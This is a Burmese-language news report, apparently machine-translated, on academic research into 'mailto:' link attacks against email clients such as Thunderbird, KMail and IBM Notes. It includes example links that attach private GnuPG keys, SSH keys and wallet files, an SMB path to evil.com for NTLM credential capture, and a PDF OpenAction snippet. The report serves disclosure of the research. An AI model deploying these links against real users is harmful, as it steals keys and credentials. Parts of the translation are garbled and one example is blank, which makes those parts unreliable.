“mailto:” လင့်ခ်များကို အသုံးပြု၍ အီးမေးလ် သုံးစွဲသူများကို တိုက်ခိုက်ခြင်း။

Ruhr University Bochum (ဂျာမနီ) မှ သုတေသီများ၊ ခွဲခြမ်းစိတ်ဖြာ (PDF ဖိုင်ရယူရန်) အဆင့်မြင့် ကန့်သတ်ဘောင်များဖြင့် “mailto:” လင့်ခ်များကို လုပ်ဆောင်သည့်အခါ မေးလ်ဖောက်သည်များ၏ အပြုအမူ။ ဆန်းစစ်ထားသော အီးမေးလ်ဖောက်သည်အယောက်နှစ်ဆယ်မှ ငါးဦးသည် “attach” ကန့်သတ်ဘောင်ကို အသုံးပြု၍ အရင်းအမြစ်အစားထိုးခြင်းအား ကြိုးကိုင်ထားသည့် တိုက်ခိုက်မှုကို ခံနိုင်ရည်ရှိကြသည်။ နောက်ထပ် အီးမေးလ်ကလိုင်းယင့် ခြောက်ဦးသည် PGP နှင့် S/MIME သော့အစားထိုး တိုက်ခိုက်မှုကို ခံနိုင်ရည်ရှိပြီး ကုဒ်ကုဒ်လုပ်ထားသော မက်ဆေ့ချ်များ၏ အကြောင်းအရာများကို ထုတ်ယူရန် ဖောက်သည် သုံးဦးသည် တိုက်ခိုက်ခြင်းတွင် အားနည်းချက်ရှိသည်။

လင့်များ «Mailto:"လင့်ခ်တွင် သတ်မှတ်ထားသော လိပ်စာပေးသူထံ စာတစ်စောင်ရေးရန်အတွက် အီးမေးလ်ကလိုင်းယင့်ကို အလိုအလျောက်ဖွင့်ရန် အသုံးပြုသည်။ လိပ်စာအပြင်၊ စာ၏အကြောင်းအရာနှင့် ပုံမှန်အကြောင်းအရာအတွက် ပုံစံခွက်ကဲ့သို့သော လင့်ခ်၏တစ်စိတ်တစ်ပိုင်းအဖြစ် အပိုဘောင်များကို သင်သတ်မှတ်နိုင်သည်။ အဆိုပြုထားသော တိုက်ခိုက်မှုသည် ထုတ်လုပ်ထားသော မက်ဆေ့ဂျ်တွင် ပူးတွဲပါဖိုင်ကို ပူးတွဲထည့်သွင်းခွင့်ပြုသည့် "ပူးတွဲပါ" ကန့်သတ်ဘောင်ကို ကြိုးကိုင်သည်။

မေးလ်ဖောက်သည်များ Thunderbird၊ GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) နှင့် Pegasus Mail တို့သည် သင့်အား အလိုအလျောက် ပူးတွဲလုပ်ဆောင်နိုင်စေမည့် အသေးအဖွဲတိုက်ခိုက်မှုကို ခံနိုင်ရည်ရှိသည်။ “mailto:?attach=path_to_file” ကဲ့သို့သော လင့်ခ်မှတစ်ဆင့် သတ်မှတ်ထားသော မည်သည့် ပြည်တွင်းဖိုင်မဆို။ သတိပေးချက်မပြဘဲ ဖိုင်ကို ပူးတွဲပါရှိသောကြောင့် အထူးဂရုမပြုဘဲ ပူးတွဲပါဖိုင်နှင့်အတူ ပေးပို့မည်ကို အသုံးပြုသူ သတိမထားမိနိုင်ပါ။

ဥပမာအားဖြင့်၊ “mailto:[အီးမေးလ်ကိုကာကွယ်ထားသည်]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" သင်သည် GnuPG မှ သီးသန့်သော့များကို စာလုံးထဲသို့ ထည့်နိုင်သည်။ သင်သည် crypto ပိုက်ဆံအိတ်များ (~/.bitcoin/wallet.dat)၊ SSH သော့များ (~/.ssh/id_rsa) နှင့် အသုံးပြုသူထံသို့ ဝင်ရောက်နိုင်သော မည်သည့်ဖိုင်များကိုမဆို ပေးပို့နိုင်ပါသည်။ ထို့အပြင်၊ Thunderbird သည် "attach=/tmp/*.txt" ကဲ့သို့သော တည်ဆောက်မှုများကို အသုံးပြု၍ မျက်နှာဖုံးဖြင့် ဖိုင်အုပ်စုများကို ပူးတွဲနိုင်စေပါသည်။

ဒေသတွင်းဖိုင်များအပြင်၊ အချို့သော အီးမေးလ်ဖောက်သည်များသည် IMAP ဆာဗာရှိ ကွန်ရက်သိုလှောင်မှုနှင့် လမ်းကြောင်းများသို့ လင့်ခ်များကို လုပ်ဆောင်သည်။ အထူးသဖြင့်၊ IBM Notes သည် “attach=\\evil.com\dummyfile” ကဲ့သို့သော လင့်ခ်များကို လုပ်ဆောင်သည့်အခါတွင် ကွန်ရက်လမ်းညွှန်တစ်ခုမှ ဖိုင်တစ်ခုကို လွှဲပြောင်းနိုင်စေသည့်အပြင် တိုက်ခိုက်သူ ထိန်းချုပ်ထားသည့် SMB ဆာဗာသို့ လင့်ခ်တစ်ခု ပေးပို့ခြင်းဖြင့် NTLM စစ်မှန်ကြောင်းအထောက်အထားများကို ကြားဖြတ်ခွင့်ပြုသည်။ (တောင်းဆိုချက်ကို လက်ရှိ အထောက်အထားစိစစ်ခြင်းဘောင်များကို အသုံးပြုသူနှင့်အတူ ပေးပို့ပါမည်။)

Thunderbird သည် သင့်အား IMAP ဆာဗာရှိ ဖိုင်တွဲများမှ အကြောင်းအရာများကို ပူးတွဲတင်ခွင့်ပြုသည့် “attach=imap:///fetch>UID>/INBOX>1/” ကဲ့သို့သော တောင်းဆိုမှုများကို အောင်မြင်စွာ လုပ်ဆောင်ပါသည်။ တစ်ချိန်တည်းမှာပင်၊ OpenPGP နှင့် S/MIME မှတစ်ဆင့် ကုဒ်ဝှက်ထားသော IMAP မှ ပြန်လည်ရယူထားသော စာများကို မပို့မီ မေးလ်ကလိုင်းယင့်က အလိုအလျောက် စာဝှက်ထားသည်။ Thunderbird ၏ developer များဖြစ်သည်။ အကြောင်းကြားသည်။ ဖေဖေါ်ဝါရီလ ပြဿနာနှင့် ပတ်သက်သော ကိစ္စ Thunderbird ကို 78 ပြဿနာကို ဖြေရှင်းပြီးပြီ (Thunderbird အကိုင်းအခက် 52၊ 60 နှင့် 68 တို့သည် အားနည်းနေသေးသည်)။

Thunderbird ၏ ဗားရှင်းဟောင်းများသည် သုတေသီများ အဆိုပြုထားသော PGP နှင့် S/MIME ပေါ်ရှိ အခြားသော တိုက်ခိုက်မှုမျိုးကွဲနှစ်ခုကိုလည်း ထိခိုက်စေနိုင်သည်။ အထူးသဖြင့်၊ Thunderbird ၊ အပြင် OutLook၊ PostBox၊ eM Client၊ MailMate နှင့် R2Mail2 တို့သည် စာတိုက်ကလိုင်းယင့်သည် S/MIME မက်ဆေ့ဂျ်များတွင် ပေးပို့သည့် လက်မှတ်အသစ်များကို အလိုအလျောက်တင်သွင်းပြီး ထည့်သွင်းပေးသောကြောင့် သော့အစားထိုးတိုက်ခိုက်မှုကို ခံရပါသည်။ တိုက်ခိုက်သူသည် အသုံးပြုသူ သိမ်းဆည်းထားပြီးသော အများသူငှာသော့များကို အစားထိုးစုစည်းရန်။

Thunderbird၊ PostBox နှင့် MailMate တို့သည် ခံရနိုင်ချေရှိသော ဒုတိယတိုက်ခိုက်မှုသည် မူကြမ်းမက်ဆေ့ချ်များကို အလိုအလျောက်သိမ်းဆည်းခြင်းအတွက် ယန္တရား၏အင်္ဂါရပ်များကို ကြိုးကိုင်ကာ စာတိုဘောင်ဘောင်များကို အသုံးပြုကာ၊ စာဝှက်ထားသောစာများကို စာဝှက်စာဝှက်ကို စတင်ရန် သို့မဟုတ် မတရားသောစာများအတွက် ဒစ်ဂျစ်တယ်လက်မှတ်ကို ထပ်ပေါင်းခြင်းနှင့်အတူ၊ ရလဒ်ကို တိုက်ခိုက်သူ၏ IMAP ဆာဗာသို့ ပေးပို့ခြင်း။ ဤတိုက်ခိုက်မှုတွင်၊ စာဝှက်စာသားကို "ကိုယ်ထည်" ကန့်သတ်ဘောင်မှတဆင့် ပေးပို့ပြီး တိုက်ခိုက်သူ၏ IMAP ဆာဗာသို့ ခေါ်ဆိုမှုစတင်ရန်အတွက် "မက်တာပြန်လည်ဆန်းသစ်ခြင်း" တဂ်ကို အသုံးပြုသည်။ ဥပမာအားဖြင့်: ' '

သုံးစွဲသူအပြန်အလှန်တုံ့ပြန်မှုမရှိဘဲ “mailto:” လင့်ခ်များကို အလိုအလျောက်လုပ်ဆောင်ရန်၊ အထူးဒီဇိုင်းထုတ်ထားသော PDF စာရွက်စာတမ်းများကိုအသုံးပြုနိုင်သည် - PDF ရှိ OpenAction လုပ်ဆောင်ချက်သည် စာရွက်စာတမ်းတစ်ခုကိုဖွင့်သည့်အခါ စာတိုက်ကိုင်တွယ်သူကို အလိုအလျောက်စတင်နိုင်စေသည်-

%PDF-1.5
၀တ္တု ၁ ခု
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

၀တ္တု ၁ ခု
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj

source: opennet.ru